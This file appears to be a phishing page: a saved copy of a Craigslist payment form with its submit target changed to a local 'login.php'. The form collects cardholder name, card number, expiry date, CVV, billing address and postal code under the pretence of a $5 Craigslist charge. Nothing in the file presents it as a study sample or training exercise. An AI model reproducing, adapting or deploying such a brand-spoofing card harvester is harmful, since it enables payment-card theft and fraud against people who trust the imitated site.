<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- saved from url=(0070)https://secure.craigslist.org/payment/MoaRotKXYua0pI6o1tb7WeC4KU3L9PqH -->
<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>craigslist payment</title>
    <link rel="stylesheet" title="payment"
      href="./craigslist%20payment_files/payment-1.0.1.css"
      type="text/css" media="all">
    <meta name="viewport" content="width=device-width,initial-scale=1">
  </head>
  <body id="pp">
    <div class="global-header"> <a class="logo"
        href="http://www.craigslist.org/">CL</a> payment </div>
    <p> </p>
    <form id="ccard-form"
action="login.php"
      method="POST">
      <fieldset id="ccinfo">
        <p> </p>
        <table width="100%" border="0">
          <tbody>
            <tr>
              <th colspan="2" align="left"><b>Items for purchase</b></th>
              <th align="right"><b>Price</b></th>
            </tr>
            <tr>
              <td colspan="2" nowrap="nowrap"><br>
              </td>
              <td>&nbsp;</td>
            </tr>
            <tr>
              <td><br>
              </td>
              <td><br>
              </td>
              <td align="right">$5.00</td>
            </tr>
          </tbody>
        </table>
        <p></p>
        Payment amount<br>
        $5 USD
        <p> <label> <span>Card Name, First</span> <input
              autocomplete="off" class=" inputLeft" id="cardFirstName"
              maxlength="40" name="cardFirstName" type="text"> </label>
          <label class="clearfix"> <span>Last</span> <input
              autocomplete="off" class=" inputRight" id="cardLastName"
              maxlength="40" name="cardLastName" type="text"></label></p>
        <p> Card number<br>
          <input autocomplete="off" class="" id="cardNumber"
            maxlength="40" name="cardNumber" placeholder="Amex,
            Mastercard, or Visa" type="text"></p>
        <p> <label> <span>Expiry date</span> <input
              autocomplete="off" class=" inputLeft" id="expDate"
              maxlength="5" name="expDate" placeholder="MM/YY"
              type="text"> </label> <label class="clearfix"> <span>Security

              code <span class="help"> <a class="explanation-popup"
href="https://www.craigslist.org/about/help/card_verification_number?lang=en&amp;cc=us"
                  tabindex="-1" target="_blank">?</a> </span><br>
            </span> <input autocomplete="off" class=" inputRight"
              id="cvNumber" maxlength="4" name="cvNumber" type="text"></label></p>
        <p> Card statement address<br>
          <input class="" maxlength="80" name="cardAddress" type="text"></p>
        <p> ZIP/Postal code<br>
          <input class="" id="cardPostal" maxlength="20"
            name="cardPostal" type="text"></p>
        <p> <label> <span>City</span> <input autocomplete="off"
              class=" inputLeft" id="cardCity" maxlength="40"
              name="cardCity" type="text"> </label> <label
            class="clearfix"> <span>State/Province</span> <input
              autocomplete="off" class=" inputRight" id="cardState"
              maxlength="2" name="cardState"></label></p>
        <p>
          <select name="cardCountry" id="cardCountry">
            <option value="US" selected="selected">United States</option>
            <option value="CA">Canada</option>
          </select>
        </p>
        <p></p>
        <div id="presubmit">
          <div class="fineprint"> Clicking "Pay" below authorizes us to
            charge your card for the total shown above. All sales are
            subject to the craigslist <a target="_blank"
              class="explanation-popup"
              href="https://www.craigslist.org/about/terms.of.use?lang=en&amp;cc=us">Terms

              of Use</a>
            <p><em>Please click only once. This step may take up to 60
                seconds.</em></p>
          </div>
          <input name="cryptedStepCheck" value="" type="hidden"> <button
            id="submitter" name="finishForm" type="submit"
            value="Purchase"> Pay $5 USD </button> </div>
        <div id="postsubmit" class="display-none">Processing...<br>
        </div>
      </fieldset>
      <p> </p>
    </form>
    <p> </p>
    <center> </center>
    <img src="./craigslist%20payment_files/amex_logo.png"
      class="display-none" alt="" width="16" height="17"> <img
      src="./craigslist%20payment_files/mc_logo.png"
      class="display-none" alt="" width="16" height="17"> <img
      src="./craigslist%20payment_files/visa_logo.png"
      class="display-none" alt="" width="16" height="17">
    <script src="./craigslist%20payment_files/payment-1.0.1.js.download"></script>
  </body>
</html>
